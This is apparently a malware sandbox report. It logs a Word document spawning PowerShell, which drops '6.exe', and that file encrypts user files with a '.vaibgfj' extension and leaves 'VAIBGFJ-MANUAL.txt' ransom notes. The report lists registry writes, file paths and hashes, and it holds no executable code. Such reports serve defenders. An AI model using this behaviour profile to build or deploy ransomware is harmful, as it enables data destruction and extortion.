HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
4076
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
4076
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
4076
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
4076
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3020
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3020
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
EnableFileTracing
0
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
EnableConsoleTracing
0
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
FileTracingMask
4294901760
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
ConsoleTracingMask
4294901760
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
MaxFileSize
1048576
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
FileDirectory
%windir%\tracing
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
EnableFileTracing
0
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
EnableConsoleTracing
0
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
FileTracingMask
4294901760
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
ConsoleTracingMask
4294901760
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
MaxFileSize
1048576
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASMANCS
FileDirectory
%windir%\tracing
3020
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3020
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3020
6.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
DefaultConnectionSettings
460000000200000009000000000000000000000000000000040000000000000070BFA01B77DAD401000000000000000000000000020000001700000000000000FE80000000000000A179B3FF019923140B000000EFBE00000000000000002A00000000000000000000000000000000000000000000000000570069006E0064006F007700730000001600560031000000000000000000100073797374656D333200003E0008000400EFBE00000000000000002A000000000002000000C0A86414000000000000000000000000730079007300740065006D0033003200000018005000310000000000000000001000636F6E66696700003A0008000400EFBE00000000000000002A0000000000000000000000000000000000000000000000000063006F006E0066006900670000001600000063E6F3050200
3020
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
WpadLastNetwork
3020
6.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3020
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510

Files activity

Executable files
1
Suspicious files
430
Text files
319
Unknown types
20

Dropped files

PID
Process
Filename
Type
4076
powershell.exe
C:\windows\temp\6.exe
executable
MD5: 25dc3086de8bdd780b89b0a7cd9d51bb
SHA256: c50167d9a899572e7dba0da1d80e3b9a94b2d3803a8f125119097ed5f92add6d
3320
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRDD71.tmp.cvr
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Videos\Sample Videos\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.vaibgfj
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Recorded TV\Sample Media\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Recorded TV\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.vaibgfj
binary
MD5: 8ea403dbc0cd2f40bacfa6192aee897f
SHA256: 113fbfd59a4f467540f5b2f125a16b77105f3140f51dec7051ea6f1518777b8f
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.vaibgfj
binary
MD5: 2e4dd7087557fb69ad486f3896a848b7
SHA256: 0971033bbf0c20652e7d05348014561ef8443bf11143edb344896a4ee78ebff6
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.vaibgfj
binary
MD5: 20514e5e8a9caa54a03b639905fdd029
SHA256: e2927cfe00e16a83bef0ba8e356a38362941069d7a5d06b30ccf1f33bf74ba32
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.vaibgfj
binary
MD5: 14a9c97e40257373f045af2c0503e95b
SHA256: d4e08a5a1bc5b2ec542a4bdd1e4c7cb97824994e391c08295908be22dc825a35
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.vaibgfj
binary
MD5: a0c004854ed345b4eeabf1b397f436c7
SHA256: 5a135273e3d5d487daacf5b4840bd152afa22b9a8001930c1cc98e35549b15d5
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.vaibgfj
binary
MD5: 45f2bb845911add1c6de58158f6d43cc
SHA256: 2488753daafdab9f6264ff6d88a1cb26c0a9e2e2aa97c01627dc63368a601f0f
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.vaibgfj
binary
MD5: 223262dbdf841f6a45f0512692a8eb06
SHA256: 11d8ce1505e69d7d32d8ae09e8d8f3d68945901f361e26db78f8dea1a673c92c
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.vaibgfj
binary
MD5: 2ed5e680060e850016b9450ff8732067
SHA256: e1feb0ba2a7e2a0459bb3893b491c15b77c7fb2545a2009cdecf6f5f27720fe8
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Pictures\Sample Pictures\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.vaibgfj
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.vaibgfj
binary
MD5: e7ffe064625b9ea76239924dd36bc623
SHA256: 26a6788206016e170b705ddef04fc447a44218d98c92dec9c9befde62ce35f42
3020
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.vaibgfj
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.vaibgfj
binary
MD5: 1a4a6f544e91050a7b94631640d80347
SHA256: 952a392a6edbb53e6a7bff8ea39ab220c912082f2a500f41beb561cc3f54a90d
3020
6.exe
C:\Users\Public\Music\Sample Music\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Public\Libraries\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Downloads\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Favorites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Music\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Videos\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Documents\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Desktop\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\Pictures\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Public\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Saved Games\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.vaibgfj
binary
MD5: 086d937960d0cb7fa9d36079435c4384
SHA256: bcfdd717fda9d6a5006f54da48280f3af31d928ac44024983d3abe18d1b3eafc
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.vaibgfj
binary
MD5: 67c68327c0b153eee39adbabfaa60147
SHA256: a084981c80f0eac2435ea3e3d33ac206f41d7d67e90d25426af9259805aac99d
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.vaibgfj
binary
MD5: f159b0c5c676d054afeb7532bc191810
SHA256: eaf31f4a1a7ee49a8822f6f8ecf7ee96621f4c2662d7081217606840c66a3c66
3020
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Default\NTUSER.DAT.LOG1.vaibgfj
binary
MD5: 5214ad50f165b5229d443183dc4d5cb4
SHA256: 118dd6391c605657eccb67938a0503a68d9aab4fc857bd2d18be92b7b8d827f2
3020
6.exe
C:\Users\Default\NTUSER.DAT.LOG1
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Default\Pictures\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Videos\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Links\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Downloads\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Music\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Favorites\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Documents\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Media Center Programs\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\Desktop\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Roaming\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Local\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Local\Temp\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Local\Microsoft\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\History\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
